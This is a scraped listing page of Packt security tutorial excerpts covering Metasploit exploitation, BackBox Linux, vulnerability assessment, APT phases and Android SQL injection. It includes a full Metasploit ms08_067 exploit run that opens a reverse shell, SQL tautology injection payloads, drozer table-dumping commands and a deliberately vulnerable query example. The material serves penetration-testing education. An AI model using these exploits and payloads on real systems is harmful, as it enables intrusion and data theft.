Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

172 Articles
article-image-target-exploitation
Packt
14 Mar 2014
14 min read
Save for later

Target Exploitation

Packt
14 Mar 2014
14 min read
(For more resources related to this topic, see here.) Vulnerability research Understanding the capabilities of a specific software or hardware product may provide a starting point for investigating vulnerabilities that could exist in that product. Conducting vulnerability research is not easy, neither is it a one-click task. Thus, it requires a strong knowledge base with different factors to carry out security analysis. The following are the factors to carry out security analysis: Programming skills: This is a fundamental factor for ethical hackers. Learning the basic concepts and structures that exist with any programming language should grant the tester with an imperative advantage of finding vulnerabilities. Apart from the basic knowledge of programming languages, you must be prepared to deal with the advanced concepts of processors, system memory, buffers, pointers, data types, registers, and cache. These concepts are implementable in almost any programming language such as C/C++, Python, Perl, and Assembly. To learn the basics of writing an exploit code from a discovered vulnerability, please visit http://www.phreedom.org/presentations/exploit-code-development/. Reverse engineering: This is another wide area for discovering the vulnerabilities that could exist in the electronic device, software, or system by analyzing its functions, structures, and operations. The purpose is to deduce a code from a given system without any prior knowledge of its internal working, to examine it for error conditions, poorly designed functions, and protocols, and to test the boundary conditions. There are several reasons that inspire the practice of reverse engineering skills such as the removal of copyright protection from a software, security auditing, competitive technical intelligence, identification of patent infringement, interoperability, understanding the product workflow, and acquiring the sensitive data. Reverse engineering adds two layers of concept to examine the code of an application: source code auditing and binary auditing. If you have access to the application source code, you can accomplish the security analysis through automated tools or manually study the source in order to extract the conditions where vulnerability can be triggered. On the other hand, binary auditing simplifies the task of reverse engineering where the application exists without any source code. Disassemblers and decompilers are two generic types of tools that may assist the auditor with binary analysis. Disassemblers generate the assembly code from a complied binary program, while decompilers generate a high-level language code from a compiled binary program. However, dealing with either of these tools is quite challenging and requires a careful assessment. Instrumented tools: Instrumented tools such as debuggers, data extractors, fuzzers, profilers, code coverage, flow analyzers, and memory monitors play an important role in the vulnerability discovery process and provide a consistent environment for testing purposes. Explaining each of these tool categories is out of the scope of this book. However, you may find several useful tools already present under Kali Linux. To keep a track of the latest reverse code engineering tools, we strongly recommend that you visit the online library at http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools. Exploitability and payload construction: This is the final step in writing the proof-of-concept (PoC) code for a vulnerable element of an application, which could allow the penetration tester to execute custom commands on the target machine. We apply our knowledge of vulnerable applications from the reverse engineering stage to polish shellcode with an encoding mechanism in order to avoid bad characters that may result in the termination of the exploit process. Depending on the type and classification of vulnerability discovered, it is very significant to follow the specific strategy that may allow you to execute an arbitrary code or command on the target system. As a professional penetration tester, you may always be looking for loopholes that should result in getting a shell access to your target operating system. Thus, we will demonstrate a few scenarios with the Metasploit framework, which will show these tools and techniques. Vulnerability and exploit repositories For many years, a number of vulnerabilities have been reported in the public domain. Some of these were disclosed with the PoC exploit code to prove the feasibility and viability of a vulnerability found in the specific software or application. And, many still remain unaddressed. This competitive era of finding the publicly available exploits and vulnerability information makes it easier for penetration testers to quickly search and retrieve the best available exploit that may suit their target system environment. You can also port one type of exploit to another type (for example, Win32 architecture to Linux architecture) provided that you hold intermediate programming skills and a clear understanding of OS-specific architecture. We have provided a combined set of online repositories that may help you to track down any vulnerability information or its exploit by searching through them. Not every single vulnerability found has been disclosed to the public on the Internet. Some are reported without any PoC exploit code, and some do not even provide detailed vulnerability information. For this reason, consulting more than one online resource is a proven practice among many security auditors. The following is a list of online repositories: Repository name Website URL Bugtraq SecurityFocus http://www.securityfocus.com OSVDB Vulnerabilities http://osvdb.org Packet Storm http://www.packetstormsecurity.org VUPEN Security http://www.vupen.com National Vulnerability Database http://nvd.nist.gov ISS X-Force http://xforce.iss.net US-CERT Vulnerability Notes http://www.kb.cert.org/vuls US-CERT Alerts http://www.us-cert.gov/cas/techalerts/ SecuriTeam http://www.securiteam.com Government Security Org http://www.governmentsecurity.org Secunia Advisories http://secunia.com/advisories/historic/ Security Reason http://securityreason.com XSSed XSS-Vulnerabilities http://www.xssed.com Security Vulnerabilities Database http://securityvulns.com SEBUG http://www.sebug.net BugReport http://www.bugreport.ir MediaService Lab http://lab.mediaservice.net Intelligent Exploit Aggregation Network http://www.intelligentexploit.com Hack0wn http://www.hack0wn.com Although there are many other Internet resources available, we have listed only a few reviewed ones. Kali Linux comes with an integration of exploit database from Offensive Security. This provides an extra advantage of keeping all archived exploits to date on your system for future reference and use. To access Exploit-DB, execute the following commands on your shell: # cd /usr/share/exploitdb/ # vim files.csv This will open a complete list of exploits currently available from Exploit-DB under the /pentest/exploits/exploitdb/platforms/ directory. These exploits are categorized in their relevant subdirectories based on the type of system (Windows, Linux, HP-UX, Novell, Solaris, BSD, IRIX, TRU64, ASP, PHP, and so on). Most of these exploits were developed using C, Perl, Python, Ruby, PHP, and other programming technologies. Kali Linux already comes with a handful set of compilers and interpreters that support the execution of these exploits. How to extract particular information from the exploits list? Using the power of bash commands, you can manipulate the output of any text file in order to retrieve the meaningful data. You can either use searchsploit, or this can also be accomplished by typing cat files.csv |grep '"' |cut -d";" -f3 on your console. It will extract the list of exploit titles from a files.csv file. To learn the basic shell commands, please refer to http://tldp.org/LDP/abs/html/index.html. Advanced exploitation toolkit Kali Linux is preloaded with some of the best and most advanced exploitation toolkits. The Metasploit framework (http://www.metasploit.com) is one of these. We have explained it in a greater detail and presented a number of scenarios that would effectively increase the productivity and enhance your experience with penetration testing. The framework was developed in the Ruby programming language and supports modularization such that it makes it easier for the penetration tester with optimum programming skills to extend or develop custom plugins and tools. The architecture of a framework is divided into three broad categories: libraries, interfaces, and modules. A key part of our exercises is to focus on the capabilities of various interfaces and modules. Interfaces (console, CLI, web, and GUI) basically provide the front-end operational activity when dealing with any type of modules (exploits, payloads, auxiliaries, encoders, and NOP). Each of the following modules have their own meaning and are function-specific to the penetration testing process. Exploit: This module is the proof-of-concept code developed to take advantage of a particular vulnerability in a target system Payload: This module is a malicious code intended as a part of an exploit or independently compiled to run the arbitrary commands on the target system Auxiliaries: These modules are the set of tools developed to perform scanning, sniffing, wardialing, fingerprinting, and other security assessment tasks Encoders: These modules are provided to evade the detection of antivirus, firewall, IDS/IPS, and other similar malware defenses by encoding the payload during a penetration operation No Operation or No Operation Performed (NOP): This module is an assembly language instruction often added into a shellcode to perform nothing but to cover a consistent payload space For your understanding, we have explained the basic use of two well-known Metasploit interfaces with their relevant command-line options. Each interface has its own strengths and weaknesses. However, we strongly recommend that you stick to a console version as it supports most of the framework features. MSFConsole MSFConsole is one of the most efficient, powerful, and all-in-one centralized front-end interface for penetration testers to make the best use of the exploitation framework. To access msfconsole, navigate to Applications | Kali Linux | Exploitation Tools | Metasploit | Metasploit framework or use the terminal to execute the following command: # msfconsole You will be dropped into an interactive console interface. To learn about all the available commands, you can type the following command: msf > help This will display two sets of commands; one set will be widely used across the framework, and the other will be specific to the database backend where the assessment parameters and results are stored. Instructions about other usage options can be retrieved through the use of -h, following the core command. Let us examine the use of the show command as follows: msf > show -h [*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, options [*] Additional module-specific parameters are: advanced, evasion, targets, actions This command is typically used to display the available modules of a given type or all of the modules. The most frequently used commands could be any of the following: show auxiliary: This command will display all the auxiliary modules show exploits: This command will get a list of all the exploits within the framework show payloads: This command will retrieve a list of payloads for all platforms. However, using the same command in the context of a chosen exploit will display only compatible payloads. For instance, Windows payloads will only be displayed with the Windows-compatible exploits show encoders: This command will print the list of available encoders show nops: This command will display all the available NOP generators show options: This command will display the settings and options available for the specific module show targets: This command will help us to extract a list of target OS supported by a particular exploit module show advanced: This command will provide you with more options to fine-tune your exploit execution We have compiled a short list of the most valuable commands in the following table; you can practice each one of them with the Metasploit console. The italicized terms next to the commands will need to be provided by you: Commands Description check To verify a particular exploit against your vulnerable target without exploiting it. This command is not supported by many exploits. connect ip port Works similar to that of Netcat and Telnet tools. exploit To launch a selected exploit. run To launch a selected auxiliary. jobs Lists all the background modules currently running and provides the ability to terminate them. route add subnet netmask sessionid To add a route for the traffic through a compromised session for network pivoting purposes. info module Displays detailed information about a particular module (exploit, auxiliary, and so on). set param value To configure the parameter value within a current module. setg param value To set the parameter value globally across the framework to be used by all exploits and auxiliary modules. unset param It is a reverse of the set command. You can also reset all variables by using the unset all command at once. unsetg param To unset one or more global variables. sessions Ability to display, interact, and terminate the target sessions. Use with -l for listing, -i ID for interaction, and -k ID for termination. search string Provides a search facility through module names and descriptions. use module Select a particular module in the context of penetration testing. It is important for you to understand their basic use with different sets of modules within the framework. MSFCLI Similar to the MSFConsole interface, a command-line interface (CLI) provides an extensive coverage of various modules that can be launched at any one instance. However, it lacks some of the advanced automation features of MSFConsole. To access msfcli, use the terminal to execute the following command: # msfcli -h This will display all the available modes similar to that of MSFConsole as well as usage instructions for selecting the particular module and setting its parameters. Note that all the variables or parameters should follow the convention of param=value and that all options are case-sensitive. We have presented a small exercise to select and execute a particular exploit as follows: # msfcli windows/smb/ms08_067_netapi O [*] Please wait while we load the module tree...      Name     Current Setting  Required  Description    ----     ---------------  --------  -----------    RHOST                     yes       The target address    RPORT    445              yes       Set the SMB service port    SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) The use of O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter: # msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P [*] Please wait while we load the module tree...   Compatible payloads ===================      Name                             Description    ----                             -----------    generic/debug_trap               Generate a debug trap in the target process    generic/shell_bind_tcp           Listen for a connection and spawn a command shell ... Finally, after setting the target IP using the RHOST parameter, it is time to select the compatible payload and execute our exploit as follows: # msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E [*] Please wait while we load the module tree... [*] Started reverse handler on 192.168.0.3:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (240 bytes) to 192.168.0.7 [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027)   Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.   C:WINDOWSsystem32> As you can see, we have acquired a local shell access to our target machine after setting the LHOST parameter for a chosen payload.
Read more
  • 0
  • 0
  • 2562

article-image-starting-out-backbox-linux
Packt
17 Feb 2014
11 min read
Save for later

Starting Out with BackBox Linux

Packt
17 Feb 2014
11 min read
(For more resources related to this topic, see here.) A flexible penetration testing distribution BackBox Linux is a very young project designed for penetration testing, vulnerability assessment and management. The key focus in using BackBox is to provide an independent security testing platform that can be easily customized with increased performance and stability. BackBox uses a very light desktop manager called XFCE. It includes the most popular security auditing tools that are essential for penetration testers and security advisers. The suite of tools includes web application analysis, network analysis, stress tests, computer sniffing forensic analysis, exploitation, documentation, and reporting. The BackBox repository is hosted on Launchpad and is constantly updated to the latest stable version of its tools. Adding and developing new tools inside the distribution requires it to be compliant with the open source community and particularly the Debian Free Software Guidelines criteria. IT security and penetration testing are dedicated sectors and quite new in the global market. There are a lot of Linux distributions dedicated to security; but if we do some research, we can see that only a couple of distributions are constantly updated. Many newly born projects stop at the first release without continuity and very few of them are updated. BackBox is one of the new players in this field and even though it is only a few years old, it has acquired an enormous user base and now holds the second place in worldwide rankings. It is a lightweight, community-built penetration testing distribution capable of running live in USB mode or as a permanent installation. BackBox now operates on release 3.09 as of September 2013, with a significant increase in users, thus becoming a stable community. BackBox is also significantly used in the professional world. BackBox is built on top of Ubuntu LTS and the 3.09 release uses 12.04 as its core. The desktop manager environment with XFCE and the ISO images are provided for 32-bit and 64-bit platforms (with the availability on Torrents and HTTP downloads from the project's website). The following screenshot shows the main view of the desktop manager, XFCE: The choice of desktop manager, XFCE, plays a very important role in BackBox. It is not only designed to serve the slender environment with medium and low level of resources, but also designed for very low memory. In case of very low memory and other resources (such as CPU, HD, and video), BackBox has an alternative way of booting the system without graphical user interface (GUI) and using command-line only, which requires really minimal amount of resources. With this aim in mind, BackBox is designed to function with pretty old and obsolete hardware to be used as a normal auditing platform. However, BackBox can be used on more powerful systems to perform actions that require the modern multicore processors to reduce ETA of the task such as brute-force attacks, data/password decryption, and password-cracking. Of course, the BackBox team aims to minimize overhead for the aforementioned cases through continuous research and development. Luckily, the majority of the tools included in BackBox can be performed in a shell/console environment and for the ones which require less resource. However, we always have our XFCE interface where we can access user-friendly GUI tools (in particular network analysis tools), which do not require many resources. Relatively, newcomer into the IT security and penetration testing environment, the first release of BackBox was back in September 09, 2010, as a project of the Italian web community. Now on its third major release and close to the next minor release (BackBox Linux 3.13 is planned for the end of January 2014), BackBox has grown rapidly and offers a wide scope for both amateur and professional use. The minimum requirements for BackBox are as follows: A 32-bit or 64-bit processor 512 MB of system memory RAM (256 MB in case there will be no desktop manager usage and only the console) 4.4 GB of disk space for installation Graphics card capable of 800 × 600 resolution (less resolution in case there will be no desktop manager usage) DVD-ROM drive or USB port The following screenshot shows the main view of BackBox with a toolbar at the bottom: The suite of auditing tools in BackBox makes the system complete and ready to use for security professionals of penetration testing. The organization of tools in BackBox. The entire set of BackBox security tools are populated into a single menu called Audit and structured into different subtasks as follows: Information Gathering Vulnerability Assessment Exploitation Privilege Escalation Maintaining Access Documentation & Reporting Social Engineering Stress Testing Forensic Analysis VoIP Analysis Wireless Analysis Miscellaneous We have to run through all the tools in BackBox by giving a short description of each single tool in the Auditing menu. The following screenshot shows the Auditing menu of BackBox: Information Gathering Information Gathering is the first absolute step of any security engineer and/or penetration tester. It is about collecting information on target systems, which can be very useful to start the assessment. Without this step, it will be quite difficult and hard to assess any system. Vulnerability Assessment After you've gathered information by performing the first step, the next step will be to analyze that information and its evaluation. Vulnerability Assessment is the process of identifying the vulnerabilities present in the system and prioritizing them. Exploitation Exploitation is the process where the weakness or bug in the software is used to penetrate the system. This can be done through the usage of an exploit, which is nothing but an automated script that is designed to perform a malicious attack on target systems. Privilege Escalation Privilege Escalation occurs when we have already gained access to the system but with low privileges. It can also be that we have legitimate access but not enough to make effective changes on the system, so we will need to elevate our privileges or gain access to another account with higher privileges. Maintaining Access Maintaining Access is about setting up an environment that will allow us to access the system again without repeating the tasks that we performed to gain access initially. Documentation & Reporting The Documentation & Reporting menu contains the tools that will allow us to collect the information during our assessment and generate a human readable report from them. Reverse Engineering The Reverse Engineering menu contains the suite of tools aimed to reverse the system by analyzing its structure for both hardware and software. Social Engineering Social Engineering is based on a nontechnical intrusion method, mainly on human interaction. It is the ability to manipulate the person and obtain his/her access credentials or the information that can introduce us to such parameters. Stress Testing The Stress Testing menu contains a group of tools aimed to test the stress level of applications and servers. Stress testing is the action where a massive amount of requests (for example, ICMP request) are performed against the target machine to create heavy traffic to overload the system. In this case, the target server is under severe stress and can be taken advantage of. For instance, the running services such as the web server, database or application server (for example, DDoS attack) can be taken down. Forensic Analysis The Forensic Analysis menu contains a great amount of useful tools to perform a forensic analysis on any system. Forensic analysis is the act of carrying out an investigation to obtain evidence from devices. It is a structured examination that aims to rebuild the user's history in a computer device or a server system. VoIP Analysis The voice over IP (VoIP) is a very commonly used protocol today in every part of the world. VoIP analysis is the act of monitoring and analyzing the network traffic with a specific analysis of VoIP calls. So in this section, we have a single tool dedicated to the analysis of VoIP systems. Wireless Analysis The Wireless Analysis menu contains a suite of tools dedicated to the security analysis of wireless protocols. Wireless analysis is the act of analyzing wireless devices to check their safety level. Miscellaneous The Miscellaneous menu contains tools that have different functionalities and can be placed in any section that we mentioned earlier, or in none of them. Services Apart from the Auditing menu, BackBox also has a Services menu. This menu is designed to populate the daemons of the tools, those which need to be manually initialized as a service. Update We have the Update menu that can be found in the main menu, just next to the Services menu. The Update menu contains the automated scripts to allow the users to update the tools that are out of APT automated system. Anonymous BackBox 3.13 has a new menu voice called Anonymous in the main menu. This menu contains a script that makes the user invisible to the network once started. The script populates a set of tools that anonymize the system while navigating, and connects to the global network, Internet. Extras Apart from the security-auditing tools, BackBox also has several privacy-protection tools. The suite of privacy-protection tools includes Tor, Polipo, and the Firefox safe mode that have been configured with a default profile in the private-browsing mode. There are many other useful tools recommended by the team but they are not included in the default ISO image. Therefore, the recommended tools are available in the BackBox repository and can be easily installed with apt-get (automated package installation tool for Debian-like systems). Completeness, accuracy, and support It is obvious that there are many alternatives when it comes to the choice of penetration testing tools for any particular auditing process. The BackBox team is mainly focused on the size of the tool library, performance, and the inclusion of the tools for security and auditing. The amount of tools included in BackBox is subject to accurate selection and testing by a team. Most of the security and penetration testing tools are implemented to perform identical functions. The BackBox team is very careful in the selection process in order to avoid duplicate applications and redundancies. Besides the wiki-based documentation provided for its set of tools, the repository of BackBox can also be imported into any of existing Ubuntu installation (or any of Debian derivative distro) by simply importing the project's Launchpad repository to the source list. Another point that the BackBox team focus their attention on is the size issue. BackBox may not offer the largest number of tools and utilities, but numbers are not equal to the quality. It has the essential tools installed by default that are sufficient to a penetration tester. However, BackBox is not a perfect penetration testing distribution. It is a very young project and aims to offer the best solution to the global community. Links and contacts BackBox is an open community where everybody's help is greatly welcomed. Here is a list of useful links to BackBox information on the Web: The BackBox main and official web page, where we can find general information about the distribution and the organization of the team, is available at http://www.BackBox.org/ The BackBox official blog, where we can find news about BackBox such as release notes and bug correction notifications, is available at http://www.BackBox.org/blog The BackBox official wikipage, where we can find many tutorials for the tools usage that are included in the distribution, is available at http://wiki.BackBox.org/ The BackBox official forum is the main discussion forum, where users can post their problems and also suggestions, is available at http://forum.BackBox.org/ The BackBox official IRC chat room is available at https://kiwiirc.com/client/irc.autistici.org:6667/?nick=BackBox_?#BackBox The BackBox official repository hosted on Launchpad, where the entire packages are located, is available at https://launchpad.net/~BackBox BackBox has also a Wikipedia page, where we can run through a brief history about how the project began, which is available at http://en.wikipedia.org/wiki/BackBox Summary In this article, we became more familiar with the BackBox environment by analyzing its menu structure and the way its tools are organized. We also provided a quick comment on each tool in BackBox. This is the only theoretical information regarding the introduction of BackBox. Resources for Article: Further resources on this subject: Penetration Testing and Setup [article] BackTrack 4: Security with Penetration Testing Methodology [article] Web app penetration testing in Kali [article]
Read more
  • 0
  • 0
  • 9358

article-image-fundamentals
Packt
20 Jan 2014
4 min read
Save for later

Fundamentals

Packt
20 Jan 2014
4 min read
(For more resources related to this topic, see here.) Vulnerability Assessment and Penetration Testing Vulnerability Assessment ( VA) and Penetrating Testing ( PT or PenTest ) are the most common types of technical security risk assessments or technical audits conducted using different tools. These tools provide best outcomes if they are used optimally. An improper configuration may lead to multiple false positives that may or may not reflect true vulnerabilities. Vulnerability assessment tools are widely used by all, from small organizations to large enterprises, to assess their security status. This helps them with making timely decisions to protect themselves from these vulnerabilities. Vulnerability Assessments and PenTests using Nessus. Nessus is a widely recognized tool for such purposes. This section introduces you to basic terminology with reference to these two types of assessments. Vulnerability in terms of IT systems can be defined as potential weaknesses in system/infrastructure that, if exploited, can result in the realization of an attack on the system. An example of a vulnerability is a weak, dictionary-word password in a system that can be exploited by a brute force attack (dictionary attack) attempting to guess the password. This may result in the password being compromised and an unauthorized person gaining access to the system. Vulnerability Assessment is a phase-wise approach to identifying the vulnerabilities existing in an infrastructure. This can be done using automated scanning tools such as Nessus, which uses its set of plugins corresponding to different types of known security loopholes in infrastructure, or a manual checklist-based approach that uses best practices and published vulnerabilities on well-known vulnerability tracking sites. The manual approach is not as comprehensive as a tool-based approach and will be more time-consuming. The kind of checks that are performed by a vulnerability assessment tool can also be done manually, but this will take a lot more time than an automated tool. Penetration Testing has an additional step for vulnerability assessment, exploiting the vulnerabilities. Penetration Testing is an intrusive test, where the personnel doing the penetration test will first do a vulnerability assessment to identify the vulnerabilities, and as a next step, will try to penetrate the system by exploiting the identified vulnerabilities. Need for Vulnerability Assessment It is very important for you to understand why Vulnerability Assessment or Penetration Testing is required. Though there are multiple direct or indirect benefits for conducting a vulnerability assessment or a PenTest, a few of them have been recorded here for your understanding. Risk prevention Vulnerability Assessment uncovers the loopholes/gaps/vulnerabilities in the system. By running these scans on a periodic basis, an organization can identify known vulnerabilities in the IT infrastructure in time. Vulnerability Assessment reduces the likelihood of noncompliance to the different compliance and regulatory requirements since you know your vulnerabilities already. Awareness of such vulnerabilities in time can help an organization to fi x them and mitigate the risks involved in advance before they get exploited. The risks of getting a vulnerability exploited include: Financial loss due to vulnerability exploits Organization reputation Data theft Confidentiality compromise Integrity compromise Availability compromise Compliance requirements The well-known information security standards (for example, ISO 27001, PCI DSS, and PA DSS) have control requirements that mandate that a Vulnerability Assessment must be performed. A few countries have specific regulatory requirements for conducting Vulnerability Assessments in some specific industry sectors such as banking and telecom. The life cycles of Vulnerability Assessment and Penetration Testing This section describes the key phases in the life cycles of VA and PenTest. These life cycles are almost identical; Penetration Testing involves the additional step of exploiting the identified vulnerabilities. It is recommended that you perform testing based on the requirements and business objectives of testing in an organization, be it Vulnerability Assessment or Penetration Testing. The following stages are involved in this life cycle: Scoping Information gathering Vulnerability scanning False positive analysis Vulnerability exploitation (Penetration Testing) Report generation The following figure illustrates the different sequential stages recommended to follow for a Vulnerability Assessment or Penetration Testing: Summary In this article, we covered an introduction to Vulnerability Assessment and Penetration Testing, along with an introduction to Nessus as a tool and steps on installing and setting up Nessus. Resources for Article: Further resources on this subject: CISSP: Vulnerability and Penetration Testing for Access Control [Article] Penetration Testing and Setup [Article] Web app penetration testing in Kali [Article]
Read more
  • 0
  • 0
  • 1320
Banner background image

article-image-social-engineering-attacks
Packt
23 Dec 2013
6 min read
Save for later

Social Engineering Attacks

Packt
23 Dec 2013
6 min read
(For more resources related to this topic, see here.) Advanced Persistent Threats Advanced Persistent Threats came into existence during cyber espionage between nations. The main motive for these attacks was monetary gain and lucrative information. APTs normally target specific organization. A targeted attack is the prerequisite for APT. The targeted attack commonly exploits vulnerability of the application on the target. The attacker normally crafts a mail with malicious attachment, such as any PDF document or an executable, which is e-mailed to the individual or group of individuals .Generally, these e-mails are prepared with some social engineering element to make it lucrative to the target. The typical characteristics of APTs are as follows: Reconnaissance: The attacker motivates to get to know the target and their environment, specific users, system configurations, and so on. This type of information can be obtained from the metadata tool collector from the targeted organization document, which can be easily collected from the target organization website by using tools such as FOCA, metagoofil, libextractor, and CeWL. Time-to-live: In APTs, attackers utilize the techniques to bypass security and deploy a backdoor to make the access for longer period of time and placing a backdoor so they can always come back in case their actual presence was detected. Advance malware: Attacker utilizes the polymorphic malware in the APT. The polymorphic generally changes throughout its cycle to fool AV detection mechanism. Phishing: Most APT exploiting the target machine application is started by social engineering and spear phishing. Once the target machine is compromised or network credentials are given up, the attackers actively take steps to deploy their own tools to monitor and spread through the network as required, from machine-to-machine, and network-to-network, until they find the information they are looking for. Active Attack: In APT, there is a human element involvement. Everything is not an automatic malicious code. Famous attacks classified under APTs are as follows: Operation Aurora McRAT Hydraq Stuxnet RSA SecureID attacks The APT life cycle covers five phases, which are as follows: Phase 1: Reconnaissance Phase 2: Initial exploitation Phase 3: Establish presence and control Phase 4: Privilege escalation Phase 5: Data extraction Phase 1: Reconnaissance It's a well-known saying, "A war is half won by not only on our strength but also how much we know our enemy". The attacker generally gathers information from variety of sources as initial preparation so definitely it applies to the defendant. Information on specific people mostly higher management people who posses important information, information about specific events, setting up initial attack point and application vulnerability. So there are multiple places such as Facebook, LinkedIn, Google, and many more where the attacker tries to find the information. There are tools that generally assist Social Engineering Framework (SEF) that we have included in the book, Kali Linux Social Engineering, and another one that I suggest is Foca Meta data collector. An attack would be planned based on the information gathering. So employee awareness program must be continuously run to make employees aware that they should not to highlight themselves on the Internet and should be better prepared to defend against these attack. Phase 2: Initial exploitation A spear-phishing attack is considered one of the most advanced targeting attacks, and they are also called advance persistent threat (APT) attacks. Today, many cyber criminals use spear phishing attack to initial exploit the machine. The objective of performing spear-phishing is to gain long term access to different resources of the target for ex-government, military network, or satellite usage. The main motivation of performing such attacks is to gain access to IT environment and utilize zero day exploit found in initial information gathering phase. Why this attack is considered most dangerous because the attacker can spoof its e-mail ID by sending a malicious e-mail. There is a complete example in graphical format implementation of this has been included in the book Kali Linux Social Engineering. Phase 3: Establishing presence and control The main objective of this stage is to deploy full range of attack tools such as backdoor and rootkits to start controlling the environment and stay undetected. The organization need to take care of the outbound connection to deter such attacks because the attack tools make the outbound connection to attacker. Phase 4: Privilege escalation This is one of the key phase in the APT. Once the attacker has breached the network, the next step is to take over the privilege accounts to move the around the targeted network. So the common objective of the attacker is to obtain an administrator level credentials and stay undetected. The best approach to defend against these attacks "assume that the attackers are inside our networks right now and proceed accordingly by blocking the pathways they're travelling to access and steal our sensitive data. Phase 5: Data extraction This is the stage where the attacker has control over one or two machine in the targeted network and have obtained access credentials to supervise it's reach and identified the lucrative data. The only objective left for the attacker to start sending the data from targeted network to one of its own server or on his own machine The attacker has number of option what he can do with this data. The attacker can ask for ransom if the target does not agree to pay the amount, he can threaten to disclose the information in the public, share the zero day exploits, sell the information, or public disclosure. APT defense The defense against the APT attacks mostly based on its characteristics. The APT attacks normally bypass the Network Firewall Defense by attaching exploits within the content carried over the allowed protocol .So deep content filtering is required. In most of the APT attacks custom-developed code or targeting zero day vulnerability is used so no single IPS or antivirus signature will be able to identify the threat so must reply on less definitive indicators. The organization must ask himself what they are trying to protect and perhaps they can apply layer of data loss prevention (DEP) technology. The organization needs to monitor both inbound or outbound network preferably for both web and e-mail communication. Summary In this article, we learned what are APTs and the types of APTs. Resources for Article: Further resources on this subject: Web app penetration testing in Kali [Article] Debugging Sikuli scripts [Article] Customizing a Linux kernel [Article]
Read more
  • 0
  • 0
  • 1893

article-image-knowing-sql-injection-attacks-and-securing-our-android-applications-them
Packt
20 Dec 2013
10 min read
Save for later

Knowing the SQL-injection attacks and securing our Android applications from them

Packt
20 Dec 2013
10 min read
(For more resources related to this topic, see here.) Enumerating SQL-injection vulnerable content providers Just like web applications, Android applications may use untrusted input to construct SQL queries and do so in a way that's exploitable. The most common case is when applications do not sanitize input for any SQL and do not limit access to content providers. Why would you want to stop a SQL-injection attack? Well, let's say you're in the classic situation of trying to authorize users by comparing a username supplied by querying a database for it. The code would look similar to the following: public boolean isValidUser(){ u_username = EditText( some user value ); u_password = EditText( some user value ); //some un-important code here... String query = "select * from users_table where username = '" + u_username + "' and password = '" + u_password +"'"; SQLiteDatabase db //some un-important code here... Cursor c = db.rawQuery( p_query, null ); return c.getCount() != 0; } What's the problem in the previous code? Well, what happens when the user supplies a password '' or '1'='1'? The query being passed to the database then looks like the following: select * from users_table where username = '" + u_username + "' and password = '' or '1'='1' " The preceding bold characters indicate the part that was supplied by the user; this query forms what's known in Boolean algebra as a logical tautology; meaning no matter what table or data the query is targeted at, it will always be set to true, which means that all the rows in the database will meet the selection criteria. This then means that all the rows in users_table will be returned and as result, even if a nonvalid password ' or '1'=' is supplied, the c.getCount() call will always return a nonzero count, leading to an authentication bypass! Given that not many Android developers would use the rawQuery call unless they need to pull off some really messy SQL queries, I've included another code snippet of a SQL-injection vulnerability that occurs more often in real-world applications. So when auditing Android code for injection vulnerabilities, a good idea would be to look for something that resembles the following: public Cursor query(Uri uri, String[] projection , String selection ,String[] selectionArgs , String sortOrder ) { SQLiteDBHelper sdbh = new StatementDBHelper(this.getContext()); Cursor cursor; try { //some code has been omitted cursor = sdbh .query(projection,selection,selectionArgs,sortOrder); } finally { sdbh.close(); } return cursor; } In the previous code, none of the projection, selection, selectionArgs, or sortOrder variables are sourced directly from external applications. If the content provider is exported and grants URI permissions or, as we've seem before, does not require any permissions, it means that attackers will be able to inject arbitrary SQL to augment the way the malicious query is evaluated. Let's look at how you actually go about attacking SQL-injection vulnerable content providers using drozer. How to do it... In this recipe, I'll talk about two kinds of SQL-injection vulnerabilities: one is when the select clause of a SQL statement is injectable and the other is when the projection is injectable. Using drozer, it is pretty easy to find select-clause-injectable content providers: dz> run app.provider.query [URI] –-selection "1=1" The previous will try to inject what's called a logical tautology into the SQL statement being parsed by the content provider and eventually the database query parser. Due to the nature of the module being used here, you can tell whether or not it actually worked, because it should return all the data from the database; that is, the select-clause criteria is applied to every row and because it will always return true, every row will be returned! You could also try any values that would always be true: dz> run app.provider.query [URI] –-selection "1-1=0" dz> run app.provider.query [URI] –-selection "0=0" dz> run app.provider.query [URI] –-selection "(1+random())*10 > 1" The following is an example of using a purposely vulnerable content provider: dz> run app.provider.query content://com.example. vulnerabledatabase.contentprovider/statements –-selection "1=1" It returns the entire table being queried, which is shown in the following screenshot: You can, of course, inject into the projection of the SELECT statement, that is, the part before FROM in the statement, that is, SELECT [projection] FROM [table] WHERE [select clause]. Securing application components Application components can be secured both by making proper use of the AndroidManifest.xml file and by forcing permission checks at code level. These two factors of application security make the permissions framework quite flexible and allow you to limit the number of applications accessing your components in quite a granular way. There are many measures that you can take to lock down access to your components, but what you should do before anything else is make sure you understand the purpose of your component, why you need to protect it, and what kind of risks your users face should a malicious application start firing off intents to your app and accessing its data. This is called a risk-based approach to security, and it is suggested that you first answer these questions honestly before configuring your AndroidManifest.xml file and adding permission checks to your apps. In this recipe, I have detailed some of the measures that you can take to protect generic components, whether they are activities, broadcast receivers, content providers, or services. How to do it... To start off, we need to review your Android application AndroidManifest.xml file. The android:exported attribute defines whether a component can be invoked by other applications. If any of your application components do not need to be invoked by other applications or need to be explicitly shielded from interaction with the components on the rest of the Android system—other than components internal to your application—you should add the following attribute to the application component's XML element: <[component name] android_exported="false"> </[component name]> Here the [component name] would either be an activity, provider, service, or receiver. How it works… Enforcing permissions via the AndroidManifest.xml file 